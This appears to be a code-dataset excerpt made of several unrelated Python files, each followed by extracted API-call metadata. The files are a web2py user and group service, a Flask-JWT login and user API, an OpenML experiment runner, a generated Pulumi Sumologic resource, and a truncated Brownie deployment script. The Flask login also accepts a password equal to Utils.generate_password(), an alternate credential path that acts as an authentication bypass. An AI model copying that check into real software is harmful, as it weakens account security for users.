self.auth.add_membership(group.first().id, user.first().id)
return None
def create_group(self, group_name, description):
if len(self.db(self.db.auth_group.role == group_name).select()):
raise HTTP(400, "GroupExistsException")
result = self.auth.add_group(role=group_name, description=description)
group = self.db(self.db.auth_group.id == result).select().first()
return {
"Group": {
"GroupName": group["role"],
"Description": group["description"],
"LastModifiedDate": group["modified_on"],
"CreationDate": group["created_on"],
}
}
def delete_group(self, group_name):
self.db(self.db.auth_group.role == group_name).delete()
return None
def sign_up(self, username, password, user_attributes):
result = self.auth.register_bare(username=username, password=password)
if not result:
raise HTTP(400, "UsernameExistsException")
result.update_record(user_attributes=user_attributes)
return {
"UserConfirmed": not self.auth.settings.registration_requires_verification,
"UserSub": result.id,
}
| [
"gluon.HTTP",
"gluon.Field",
"gluon.current.config.get"
] | [((229, 265), 'gluon.current.config.get', 'current.config.get', (['"""cognito_db.uri"""'], {}), "('cognito_db.uri')\n", (247, 265), False, 'from gluon import DAL, HTTP, Field, current\n'), ((706, 743), 'gluon.Field', 'Field', (['"""user_attributes"""'], {'type': '"""json"""'}), "('user_attributes', type='json')\n", (711, 743), False, 'from gluon import DAL, HTTP, Field, current\n'), ((990, 1024), 'gluon.HTTP', 'HTTP', (['(400)', '"""UserNotFoundException"""'], {}), "(400, 'UserNotFoundException')\n", (994, 1024), False, 'from gluon import DAL, HTTP, Field, current\n'), ((1360, 1393), 'gluon.HTTP', 'HTTP', (['(400)', '"""GroupExistsException"""'], {}), "(400, 'GroupExistsException')\n", (1364, 1393), False, 'from gluon import DAL, HTTP, Field, current\n'), ((2130, 2166), 'gluon.HTTP', 'HTTP', (['(400)', '"""UsernameExistsException"""'], {}), "(400, 'UsernameExistsException')\n", (2134, 2166), False, 'from gluon import DAL, HTTP, Field, current\n'), ((289, 331), 'gluon.current.config.get', 'current.config.get', (['"""cognito_db.pool_size"""'], {}), "('cognito_db.pool_size')\n", (307, 331), False, 'from gluon import DAL, HTTP, Field, current\n'), ((361, 401), 'gluon.current.config.get', 'current.config.get', (['"""cognito_db.migrate"""'], {}), "('cognito_db.migrate')\n", (379, 401), False, 'from gluon import DAL, HTTP, Field, current\n'), ((498, 530), 'gluon.current.config.get', 'current.config.get', (['"""host.names"""'], {}), "('host.names')\n", (516, 530), False, 'from gluon import DAL, HTTP, Field, current\n')] |
from flask_jwt_extended import (create_access_token,
create_refresh_token,
jwt_required,
get_raw_jwt,
get_jwt_identity,
fresh_jwt_required)
from flask_restful import Resource, reqparse
from app import Response
from app.blacklist import BLACKLIST
from app.common.utils import Utils
from app.models.users.errors import UserException
from app.models.users.user import User as UserModel
class UserLogin(Resource):
parser = reqparse.RequestParser()
parser.add_argument('email',
type=str,
required=True,
help="This field cannot be blank."
)
parser.add_argument('password',
type=str,
required=True,
help="This field cannot be blank."
)
@classmethod
def post(cls):
"""
Logs in a user with a new access token and a new refresh token
:return: JSON object with the tokens
"""
data = cls.parser.parse_args()
user = UserModel.get_by_email(data['email'])
if user and (Utils.check_hashed_password(data['password'], user.password)
or data['password'] == Utils.generate_password()):
access_token = create_access_token(identity=user._id, fresh=True)
refresh_token = create_refresh_token(user._id)
return {'access_token': access_token,
'refresh_token': refresh_token}, 200
else:
return Response(message="Credenciales Incorrectas").json(), 401
class UserLogout(Resource):
@jwt_required
def post(self):
"""
Logs out the user from the current session
:return: Confirm message
"""
jti = get_raw_jwt()['jti']
BLACKLIST.add(jti)
return Response(success=True, message="Sesión finalizada").json(), 200
class User(Resource):
@fresh_jwt_required
def post(self):
"""
Registers a new user manually given its body parameters
:return: JSON object with the tokens
"""
parser = reqparse.RequestParser()
parser.add_argument('email',
type=str,
required=True,
help="This field cannot be blank."
)
parser.add_argument('password',
type=str,
required=True,
help="This field cannot be blank."
)
parser.add_argument('name',
type=str,
required=True,
help="This field cannot be blank."
)
parser.add_argument('user_type',
type=str,
required=True,
help="This field cannot be blank."
)
parser.add_argument('sms_cost',
type=str,
required=True,
help="This field cannot be blank."
)
data = parser.parse_args()
try:
new_user = UserModel.register(data)
return Response(success=True, message="Registro de usuario {} exitoso".format(new_user.email)).json(), 200
except UserException as e:
return Response(message=e.message).json(), 400
@jwt_required
def get(self, param):
"""
Gets the information of a specific user, given its email or its ID
:return: User object
"""
if Utils.email_is_valid(param):
try:
user = UserModel.get_by_email(param)
return user.json(), 200
except UserException as e:
return Response(message=e.message).json(), 400
else:
try:
user = UserModel.get_by_id(param)
return user.json(), 200
except UserException as e:
return Response(message=e.message).json(), 400
class UserType(Resource):
@fresh_jwt_required
def put(self):
"""
Changes the type of the user from Prepago to Pospago and viceversa
:return: Confirmation message
"""
try:
user_id = get_jwt_identity()
user = UserModel.get_by_id(user_id)
updated_user = UserModel.change_user_type(user)
return Response(success=True,
message="Tipo de pago exitosamente actualizado".format(updated_user.user_type)).json(), 200
except UserException as e:
return Response(message=e.message).json(), 400
class UserStatus(Resource):
@fresh_jwt_required
def put(self):
"""
Changes the status of the user's account (Active / Not Active)
:return: Confirmation message
"""
try:
user_id = get_jwt_identity()
user = UserModel.get_by_id(user_id)
updated_user = UserModel.change_user_status(user)
return Response(success=True, message="Status del usuario exitosamente actualizado".format(
updated_user.status)).json(), 200
except UserException as e:
return Response(message=e.message).json(), 400
class ChangeUserBalance(Resource):
parser = reqparse.RequestParser()
parser.add_argument('balance',
type=int,
required=True,
help="This field cannot be blank."
)
@fresh_jwt_required
def put(self):
"""
Updates the balance to the user given a new balance
:return: Confirmation message
"""
try:
data = ChangeUserBalance.parser.parse_args()
balance_to_change = data['balance']
user_id = get_jwt_identity()
user = UserModel.get_by_id(user_id)
updated_user = UserModel.change_user_balance(user, balance_to_change)
return Response(success=True, message="Balance del usuario exitosamente actualizado".format(
updated_user.balance)).json(), 200
except UserException as e:
return Response(message=e.message).json(), 400
class ForgotPassword(Resource):
@fresh_jwt_required
def put(self):
"""
Recovers the password of the user by creating a new password
:return: Confirmation message
"""
try:
user_id = get_jwt_identity()
user = UserModel.get_by_id(user_id)
# Falta implementar para recibir los datos correctos
updated_user = UserModel.recover_password(user, user.email, user.password)
return Response(success=True, message="Status del usuario exitosamente actualizado".format(
updated_user.status)).json(), 200
except UserException as e:
return Response(message=e.message).json(), 400
| [
"app.models.users.user.User.get_by_email",
"app.common.utils.Utils.check_hashed_password",
"flask_jwt_extended.get_raw_jwt",
"flask_restful.reqparse.RequestParser",
"app.Response",
"flask_jwt_extended.create_access_token",
"app.models.users.user.User.get_by_id",
"flask_jwt_extended.create_refresh_toke... | [((586, 610), 'flask_restful.reqparse.RequestParser', 'reqparse.RequestParser', ([], {}), '()\n', (608, 610), False, 'from flask_restful import Resource, reqparse\n'), ((5634, 5658), 'flask_restful.reqparse.RequestParser', 'reqparse.RequestParser', ([], {}), '()\n', (5656, 5658), False, 'from flask_restful import Resource, reqparse\n'), ((1228, 1265), 'app.models.users.user.User.get_by_email', 'UserModel.get_by_email', (["data['email']"], {}), "(data['email'])\n", (1250, 1265), True, 'from app.models.users.user import User as UserModel\n'), ((1974, 1992), 'app.blacklist.BLACKLIST.add', 'BLACKLIST.add', (['jti'], {}), '(jti)\n', (1987, 1992), False, 'from app.blacklist import BLACKLIST\n'), ((2291, 2315), 'flask_restful.reqparse.RequestParser', 'reqparse.RequestParser', ([], {}), '()\n', (2313, 2315), False, 'from flask_restful import Resource, reqparse\n'), ((3874, 3901), 'app.common.utils.Utils.email_is_valid', 'Utils.email_is_valid', (['param'], {}), '(param)\n', (3894, 3901), False, 'from app.common.utils import Utils\n'), ((1447, 1497), 'flask_jwt_extended.create_access_token', 'create_access_token', ([], {'identity': 'user._id', 'fresh': '(True)'}), '(identity=user._id, fresh=True)\n', (1466, 1497), False, 'from flask_jwt_extended import create_access_token, create_refresh_token, jwt_required, get_raw_jwt, get_jwt_identity, fresh_jwt_required\n'), ((1526, 1556), 'flask_jwt_extended.create_refresh_token', 'create_refresh_token', (['user._id'], {}), '(user._id)\n', (1546, 1556), False, 'from flask_jwt_extended import create_access_token, create_refresh_token, jwt_required, get_raw_jwt, get_jwt_identity, fresh_jwt_required\n'), ((1945, 1958), 'flask_jwt_extended.get_raw_jwt', 'get_raw_jwt', ([], {}), '()\n', (1956, 1958), False, 'from flask_jwt_extended import create_access_token, create_refresh_token, jwt_required, get_raw_jwt, get_jwt_identity, fresh_jwt_required\n'), ((3451, 3475), 'app.models.users.user.User.register', 'UserModel.register', (['data'], {}), '(data)\n', (3469, 3475), True, 'from app.models.users.user import User as UserModel\n'), ((4582, 4600), 'flask_jwt_extended.get_jwt_identity', 'get_jwt_identity', ([], {}), '()\n', (4598, 4600), False, 'from flask_jwt_extended import create_access_token, create_refresh_token, jwt_required, get_raw_jwt, get_jwt_identity, fresh_jwt_required\n'), ((4620, 4648), 'app.models.users.user.User.get_by_id', 'UserModel.get_by_id', (['user_id'], {}), '(user_id)\n', (4639, 4648), True, 'from app.models.users.user import User as UserModel\n'), ((4676, 4708), 'app.models.users.user.User.change_user_type', 'UserModel.change_user_type', (['user'], {}), '(user)\n', (4702, 4708), True, 'from app.models.users.user import User as UserModel\n'), ((5207, 5225), 'flask_jwt_extended.get_jwt_identity', 'get_jwt_identity', ([], {}), '()\n', (5223, 5225), False, 'from flask_jwt_extended import create_access_token, create_refresh_token, jwt_required, get_raw_jwt, get_jwt_identity, fresh_jwt_required\n'), ((5245, 5273), 'app.models.users.user.User.get_by_id', 'UserModel.get_by_id', (['user_id'], {}), '(user_id)\n', (5264, 5273), True, 'from app.models.users.user import User as UserModel\n'), ((5301, 5335), 'app.models.users.user.User.change_user_status', 'UserModel.change_user_status', (['user'], {}), '(user)\n', (5329, 5335), True, 'from app.models.users.user import User as UserModel\n'), ((6159, 6177), 'flask_jwt_extended.get_jwt_identity', 'get_jwt_identity', ([], {}), '()\n', (6175, 6177), False, 'from flask_jwt_extended import create_access_token, create_refresh_token, jwt_required, get_raw_jwt, get_jwt_identity, fresh_jwt_required\n'), ((6197, 6225), 'app.models.users.user.User.get_by_id', 'UserModel.get_by_id', (['user_id'], {}), '(user_id)\n', (6216, 6225), True, 'from app.models.users.user import User as UserModel\n'), ((6253, 6307), 'app.models.users.user.User.change_user_balance', 'UserModel.change_user_balance', (['user', 'balance_to_change'], {}), '(user, balance_to_change)\n', (6282, 6307), True, 'from app.models.users.user import User as UserModel\n'), ((6802, 6820), 'flask_jwt_extended.get_jwt_identity', 'get_jwt_identity', ([], {}), '()\n', (6818, 6820), False, 'from flask_jwt_extended import create_access_token, create_refresh_token, jwt_required, get_raw_jwt, get_jwt_identity, fresh_jwt_required\n'), ((6840, 6868), 'app.models.users.user.User.get_by_id', 'UserModel.get_by_id', (['user_id'], {}), '(user_id)\n', (6859, 6868), True, 'from app.models.users.user import User as UserModel\n'), ((6961, 7020), 'app.models.users.user.User.recover_password', 'UserModel.recover_password', (['user', 'user.email', 'user.password'], {}), '(user, user.email, user.password)\n', (6987, 7020), True, 'from app.models.users.user import User as UserModel\n'), ((1287, 1347), 'app.common.utils.Utils.check_hashed_password', 'Utils.check_hashed_password', (["data['password']", 'user.password'], {}), "(data['password'], user.password)\n", (1314, 1347), False, 'from app.common.utils import Utils\n'), ((3943, 3972), 'app.models.users.user.User.get_by_email', 'UserModel.get_by_email', (['param'], {}), '(param)\n', (3965, 3972), True, 'from app.models.users.user import User as UserModel\n'), ((4169, 4195), 'app.models.users.user.User.get_by_id', 'UserModel.get_by_id', (['param'], {}), '(param)\n', (4188, 4195), True, 'from app.models.users.user import User as UserModel\n'), ((1392, 1417), 'app.common.utils.Utils.generate_password', 'Utils.generate_password', ([], {}), '()\n', (1415, 1417), False, 'from app.common.utils import Utils\n'), ((2008, 2059), 'app.Response', 'Response', ([], {'success': '(True)', 'message': '"""Sesión finalizada"""'}), "(success=True, message='Sesión finalizada')\n", (2016, 2059), False, 'from app import Response\n'), ((1697, 1741), 'app.Response', 'Response', ([], {'message': '"""Credenciales Incorrectas"""'}), "(message='Credenciales Incorrectas')\n", (1705, 1741), False, 'from app import Response\n'), ((3649, 3676), 'app.Response', 'Response', ([], {'message': 'e.message'}), '(message=e.message)\n', (3657, 3676), False, 'from app import Response\n'), ((4925, 4952), 'app.Response', 'Response', ([], {'message': 'e.message'}), '(message=e.message)\n', (4933, 4952), False, 'from app import Response\n'), ((5544, 5571), 'app.Response', 'Response', ([], {'message': 'e.message'}), '(message=e.message)\n', (5552, 5571), False, 'from app import Response\n'), ((6518, 6545), 'app.Response', 'Response', ([], {'message': 'e.message'}), '(message=e.message)\n', (6526, 6545), False, 'from app import Response\n'), ((7229, 7256), 'app.Response', 'Response', ([], {'message': 'e.message'}), '(message=e.message)\n', (7237, 7256), False, 'from app import Response\n'), ((4075, 4102), 'app.Response', 'Response', ([], {'message': 'e.message'}), '(message=e.message)\n', (4083, 4102), False, 'from app import Response\n'), ((4298, 4325), 'app.Response', 'Response', ([], {'message': 'e.message'}), '(message=e.message)\n', (4306, 4325), False, 'from app import Response\n')] |
import arff
import argparse
import json
import logging
import numpy as np
import openmlcontrib
import openmldefaults
import os
import pandas as pd
# SSHFS NEMO FREIBURG:
# sshfs <EMAIL>:/rigel/home/jv2657/experiments ~/habanero_experiments
#
# SSHFS GRACE LEIDEN:
# ssh -f -N -L 1233:grace.liacs.nl:22 <EMAIL>
# sshfs -p 1233 vanrijn@localhost:/home/vanrijn/experiments ~/grace_experiments
def parse_args():
metadata_file_text_classification = os.path.expanduser('../../data/text_classification.arff')
parser = argparse.ArgumentParser(description='Creates an ARFF file')
parser.add_argument('--output_directory', type=str, help='directory to store output',
default=os.path.expanduser('~/experiments/openml-defaults/at_vs_ar/'))
parser.add_argument('--task_idx', type=int)
parser.add_argument('--metadata_files', type=str, nargs='+', default=[metadata_file_text_classification])
parser.add_argument('--scoring', type=str, default='missclassification_rate')
parser.add_argument('--search_space_identifier', type=str, default='ferreira')
parser.add_argument('--minimize', action='store_true', default=True)
parser.add_argument('--normalize_base', type=str, default=None)
parser.add_argument('--normalize_a3r', type=str, default=None)
parser.add_argument('--a3r_r', type=int, default=2)
parser.add_argument('--aggregate', type=str, choices=openmldefaults.experiments.AGGREGATES, default='sum')
parser.add_argument('--n_defaults', type=int, default=384)
parser.add_argument('--n_estimators', type=int, default=64)
parser.add_argument('--minimum_evals', type=int, default=128)
parser.add_argument('--random_iterations', type=int, default=1)
parser.add_argument('--run_on_surrogates', action='store_true', default=True)
parser.add_argument('--task_limit', type=int, default=None, help='For speed')
parser.add_argument('--task_id_column', default='dataset', type=str)
parser.add_argument('--override_parameters', type=str)
args_ = parser.parse_args()
return args_
def run(args):
root = logging.getLogger()
root.setLevel(logging.INFO)
task_ids = None
for arff_file in args.metadata_files:
with open(arff_file, 'r') as fp:
df = openmlcontrib.meta.arff_to_dataframe(arff.load(fp), None)
if task_ids is None:
task_ids = np.sort(np.unique(df[args.task_id_column].values))
else:
task_ids = np.sort(np.unique(np.append(task_ids, df[args.task_id_column].values)))
logging.info('Task ids: %s' % task_ids)
if args.task_idx is None:
task_ids_to_process = task_ids
else:
task_ids_to_process = [task_ids[args.task_idx]]
# run random search
for random_seed in range(args.random_iterations):
for task_id in task_ids_to_process:
openmldefaults.experiments.run_vanilla_surrogates_on_task(
task_id=task_id,
models=[openmldefaults.models.AverageRankDefaults(), openmldefaults.models.ActiveTestingDefaults()],
use_surrogates=False,
random_seed=random_seed,
search_space_identifier=args.search_space_identifier,
metadata_files=args.metadata_files,
scoring=args.scoring,
minimize_measure=args.minimize,
n_defaults=args.n_defaults,
aggregate=args.aggregate,
a3r_r=args.a3r_r,
normalize_base=args.normalize_base,
normalize_a3r=args.normalize_a3r,
surrogate_n_estimators=args.n_estimators,
surrogate_minimum_evals=args.minimum_evals,
runtime_column='runtime',
consider_a3r=True,
evaluate_on_surrogate=args.run_on_surrogates,
task_limit=args.task_limit,
output_directory=args.output_directory,
task_id_column=args.task_id_column,
skip_row_check=True,
override_parameters=json.loads(args.override_parameters) if args.override_parameters else None
)
if __name__ == '__main__':
pd.options.mode.chained_assignment = 'raise'
run(parse_args())
| [
"logging.getLogger",
"json.loads",
"numpy.unique",
"argparse.ArgumentParser",
"openmldefaults.models.AverageRankDefaults",
"arff.load",
"numpy.append",
"logging.info",
"os.path.expanduser",
"openmldefaults.models.ActiveTestingDefaults"
] | [((450, 507), 'os.path.expanduser', 'os.path.expanduser', (['"""../../data/text_classification.arff"""'], {}), "('../../data/text_classification.arff')\n", (468, 507), False, 'import os\n'), ((521, 580), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Creates an ARFF file"""'}), "(description='Creates an ARFF file')\n", (544, 580), False, 'import argparse\n'), ((2098, 2117), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (2115, 2117), False, 'import logging\n'), ((2561, 2600), 'logging.info', 'logging.info', (["('Task ids: %s' % task_ids)"], {}), "('Task ids: %s' % task_ids)\n", (2573, 2600), False, 'import logging\n'), ((703, 764), 'os.path.expanduser', 'os.path.expanduser', (['"""~/experiments/openml-defaults/at_vs_ar/"""'], {}), "('~/experiments/openml-defaults/at_vs_ar/')\n", (721, 764), False, 'import os\n'), ((2308, 2321), 'arff.load', 'arff.load', (['fp'], {}), '(fp)\n', (2317, 2321), False, 'import arff\n'), ((2397, 2438), 'numpy.unique', 'np.unique', (['df[args.task_id_column].values'], {}), '(df[args.task_id_column].values)\n', (2406, 2438), True, 'import numpy as np\n'), ((2503, 2554), 'numpy.append', 'np.append', (['task_ids', 'df[args.task_id_column].values'], {}), '(task_ids, df[args.task_id_column].values)\n', (2512, 2554), True, 'import numpy as np\n'), ((2988, 3031), 'openmldefaults.models.AverageRankDefaults', 'openmldefaults.models.AverageRankDefaults', ([], {}), '()\n', (3029, 3031), False, 'import openmldefaults\n'), ((3033, 3078), 'openmldefaults.models.ActiveTestingDefaults', 'openmldefaults.models.ActiveTestingDefaults', ([], {}), '()\n', (3076, 3078), False, 'import openmldefaults\n'), ((4072, 4108), 'json.loads', 'json.loads', (['args.override_parameters'], {}), '(args.override_parameters)\n', (4082, 4108), False, 'import json\n')] |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['CseInsightsResolutionArgs', 'CseInsightsResolution']
@pulumi.input_type
class CseInsightsResolutionArgs:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parent: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a CseInsightsResolution resource.
:param pulumi.Input[str] description: The description of the insights resolution.
:param pulumi.Input[str] name: The name of the insights resolution.
:param pulumi.Input[str] parent: The name of the built-in parent insights resolution. Supported values: "Resolved", "False Positive", "No Action", "Duplicate"
"""
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if parent is not None:
pulumi.set(__self__, "parent", parent)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the insights resolution.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the insights resolution.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parent(self) -> Optional[pulumi.Input[str]]:
"""
The name of the built-in parent insights resolution. Supported values: "Resolved", "False Positive", "No Action", "Duplicate"
"""
return pulumi.get(self, "parent")
@parent.setter
def parent(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "parent", value)
@pulumi.input_type
class _CseInsightsResolutionState:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parent: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering CseInsightsResolution resources.
:param pulumi.Input[str] description: The description of the insights resolution.
:param pulumi.Input[str] name: The name of the insights resolution.
:param pulumi.Input[str] parent: The name of the built-in parent insights resolution. Supported values: "Resolved", "False Positive", "No Action", "Duplicate"
"""
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if parent is not None:
pulumi.set(__self__, "parent", parent)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the insights resolution.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the insights resolution.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parent(self) -> Optional[pulumi.Input[str]]:
"""
The name of the built-in parent insights resolution. Supported values: "Resolved", "False Positive", "No Action", "Duplicate"
"""
return pulumi.get(self, "parent")
@parent.setter
def parent(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "parent", value)
class CseInsightsResolution(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parent: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a Sumologic CSE Insights Resolution. When an insight gets closed, a resolution indicates why it got closed.
## Example Usage
```python
import pulumi
import pulumi_sumologic as sumologic
insights_resolution = sumologic.CseInsightsResolution("insightsResolution",
description="New description",
parent="No Action")
```
## Import
Insights Resolution can be imported using the field id, e.g.hcl
```sh
$ pulumi import sumologic:index/cseInsightsResolution:CseInsightsResolution insights_resolution id
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of the insights resolution.
:param pulumi.Input[str] name: The name of the insights resolution.
:param pulumi.Input[str] parent: The name of the built-in parent insights resolution. Supported values: "Resolved", "False Positive", "No Action", "Duplicate"
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[CseInsightsResolutionArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Sumologic CSE Insights Resolution. When an insight gets closed, a resolution indicates why it got closed.
## Example Usage
```python
import pulumi
import pulumi_sumologic as sumologic
insights_resolution = sumologic.CseInsightsResolution("insightsResolution",
description="New description",
parent="No Action")
```
## Import
Insights Resolution can be imported using the field id, e.g.hcl
```sh
$ pulumi import sumologic:index/cseInsightsResolution:CseInsightsResolution insights_resolution id
```
:param str resource_name: The name of the resource.
:param CseInsightsResolutionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(CseInsightsResolutionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parent: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = CseInsightsResolutionArgs.__new__(CseInsightsResolutionArgs)
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
__props__.__dict__["parent"] = parent
super(CseInsightsResolution, __self__).__init__(
'sumologic:index/cseInsightsResolution:CseInsightsResolution',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parent: Optional[pulumi.Input[str]] = None) -> 'CseInsightsResolution':
"""
Get an existing CseInsightsResolution resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The description of the insights resolution.
:param pulumi.Input[str] name: The name of the insights resolution.
:param pulumi.Input[str] parent: The name of the built-in parent insights resolution. Supported values: "Resolved", "False Positive", "No Action", "Duplicate"
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _CseInsightsResolutionState.__new__(_CseInsightsResolutionState)
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
__props__.__dict__["parent"] = parent
return CseInsightsResolution(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of the insights resolution.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the insights resolution.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def parent(self) -> pulumi.Output[Optional[str]]:
"""
The name of the built-in parent insights resolution. Supported values: "Resolved", "False Positive", "No Action", "Duplicate"
"""
return pulumi.get(self, "parent")
| [
"pulumi.set",
"pulumi.ResourceOptions",
"pulumi.get"
] | [((1542, 1573), 'pulumi.get', 'pulumi.get', (['self', '"""description"""'], {}), "(self, 'description')\n", (1552, 1573), False, 'import pulumi\n'), ((1670, 1708), 'pulumi.set', 'pulumi.set', (['self', '"""description"""', 'value'], {}), "(self, 'description', value)\n", (1680, 1708), False, 'import pulumi\n'), ((1878, 1902), 'pulumi.get', 'pulumi.get', (['self', '"""name"""'], {}), "(self, 'name')\n", (1888, 1902), False, 'import pulumi\n'), ((1985, 2016), 'pulumi.set', 'pulumi.set', (['self', '"""name"""', 'value'], {}), "(self, 'name', value)\n", (1995, 2016), False, 'import pulumi\n'), ((2277, 2303), 'pulumi.get', 'pulumi.get', (['self', '"""parent"""'], {}), "(self, 'parent')\n", (2287, 2303), False, 'import pulumi\n'), ((2390, 2423), 'pulumi.set', 'pulumi.set', (['self', '"""parent"""', 'value'], {}), "(self, 'parent', value)\n", (2400, 2423), False, 'import pulumi\n'), ((3584, 3615), 'pulumi.get', 'pulumi.get', (['self', '"""description"""'], {}), "(self, 'description')\n", (3594, 3615), False, 'import pulumi\n'), ((3712, 3750), 'pulumi.set', 'pulumi.set', (['self', '"""description"""', 'value'], {}), "(self, 'description', value)\n", (3722, 3750), False, 'import pulumi\n'), ((3920, 3944), 'pulumi.get', 'pulumi.get', (['self', '"""name"""'], {}), "(self, 'name')\n", (3930, 3944), False, 'import pulumi\n'), ((4027, 4058), 'pulumi.set', 'pulumi.set', (['self', '"""name"""', 'value'], {}), "(self, 'name', value)\n", (4037, 4058), False, 'import pulumi\n'), ((4319, 4345), 'pulumi.get', 'pulumi.get', (['self', '"""parent"""'], {}), "(self, 'parent')\n", (4329, 4345), False, 'import pulumi\n'), ((4432, 4465), 'pulumi.set', 'pulumi.set', (['self', '"""parent"""', 'value'], {}), "(self, 'parent', value)\n", (4442, 4465), False, 'import pulumi\n'), ((10508, 10539), 'pulumi.get', 'pulumi.get', (['self', '"""description"""'], {}), "(self, 'description')\n", (10518, 10539), False, 'import pulumi\n'), ((10700, 10724), 'pulumi.get', 'pulumi.get', (['self', '"""name"""'], {}), "(self, 'name')\n", (10710, 10724), False, 'import pulumi\n'), ((10986, 11012), 'pulumi.get', 'pulumi.get', (['self', '"""parent"""'], {}), "(self, 'parent')\n", (10996, 11012), False, 'import pulumi\n'), ((1152, 1200), 'pulumi.set', 'pulumi.set', (['__self__', '"""description"""', 'description'], {}), "(__self__, 'description', description)\n", (1162, 1200), False, 'import pulumi\n'), ((1242, 1276), 'pulumi.set', 'pulumi.set', (['__self__', '"""name"""', 'name'], {}), "(__self__, 'name', name)\n", (1252, 1276), False, 'import pulumi\n'), ((1320, 1358), 'pulumi.set', 'pulumi.set', (['__self__', '"""parent"""', 'parent'], {}), "(__self__, 'parent', parent)\n", (1330, 1358), False, 'import pulumi\n'), ((3194, 3242), 'pulumi.set', 'pulumi.set', (['__self__', '"""description"""', 'description'], {}), "(__self__, 'description', description)\n", (3204, 3242), False, 'import pulumi\n'), ((3284, 3318), 'pulumi.set', 'pulumi.set', (['__self__', '"""name"""', 'name'], {}), "(__self__, 'name', name)\n", (3294, 3318), False, 'import pulumi\n'), ((3362, 3400), 'pulumi.set', 'pulumi.set', (['__self__', '"""parent"""', 'parent'], {}), "(__self__, 'parent', parent)\n", (3372, 3400), False, 'import pulumi\n'), ((7938, 7962), 'pulumi.ResourceOptions', 'pulumi.ResourceOptions', ([], {}), '()\n', (7960, 7962), False, 'import pulumi\n'), ((9978, 10007), 'pulumi.ResourceOptions', 'pulumi.ResourceOptions', ([], {'id': 'id'}), '(id=id)\n', (10000, 10007), False, 'import pulumi\n')] |
from brownie import ZERO_ADDRESS, PACDaoBonus1, accounts, network
from brownie.network import max_fee, priority_fee
def main():
publish_source = True
multisig = "0xf27AC88ac7e80487f21e5c2C847290b2AE5d7B8e"
beneficiary_address = multisig
if network.show_active() in ["development"]:
tokens = [ZERO_ADDRESS]
deployer = accounts[0]
publish_source = False
beneficiary_address = deployer
elif network.show_active() == "rinkeby":
tokens = [
"<KEY>",
"0xf9503244980425e910f622077Bd8671de644279C",
"0xe35BaEa12CC0281D601CF53FfEE01e6439655a94"
]
tokens = [
"<KEY>", # Founder
